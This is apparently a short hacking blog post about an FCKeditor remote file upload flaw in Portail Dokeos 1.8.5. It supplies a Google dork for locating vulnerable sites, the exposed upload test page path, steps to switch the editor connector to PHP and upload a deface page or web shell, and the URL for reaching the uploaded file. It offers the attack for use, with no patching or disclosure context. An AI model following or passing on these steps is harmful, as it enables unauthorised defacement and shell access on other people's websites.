“Portail Dokeos” deface and Shell Upload vulnerability

Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability
in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password

code-hack.jpg (240×240)

Google Dork : “Portail Dokeos 1.8.5”
Exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Goto : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html chnage asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here
To view your uploaded file go here : http://website/patch/main/upload/your file here

Leave a comment